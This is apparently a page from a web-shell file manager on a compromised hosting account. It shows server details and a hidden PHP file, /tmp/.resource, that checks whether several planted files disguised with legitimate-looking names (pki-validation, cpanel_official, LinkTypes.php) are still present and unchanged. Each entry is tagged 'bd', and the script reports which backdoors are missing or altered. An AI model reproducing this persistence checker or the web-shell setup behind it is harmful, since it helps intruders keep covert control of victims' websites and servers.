HEX
Server: LiteSpeed
System: Linux premium140.web-hosting.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
User: ukqcurpj (1011)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: //tmp/.resource
<?php   $r = '/home/ukqcurpj/codestudio.pk'; $x = ["/.well-known/lotusscript.php"=>"bd@@367177@@1005",
"/.well-known/pki-validation/factory.php"=>"bd@@379278@@63",
"/LinkTypes.php"=>"bd@@400470@@1032",
"/.well-known/pki-validation/factory.php"=>"bd@@372386@@897",
"/cpanel_official/Data.php"=>"bd@@371114@@1009",
"/LinkTypes.php"=>"bd@@402883@@50",
"/.well-known/lotusscript.php"=>"bd@@370886@@3",
"/cpanel_official/Data.php"=>"bd@@372363@@80",
"/index.php"=>"bd@@370948@@9"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');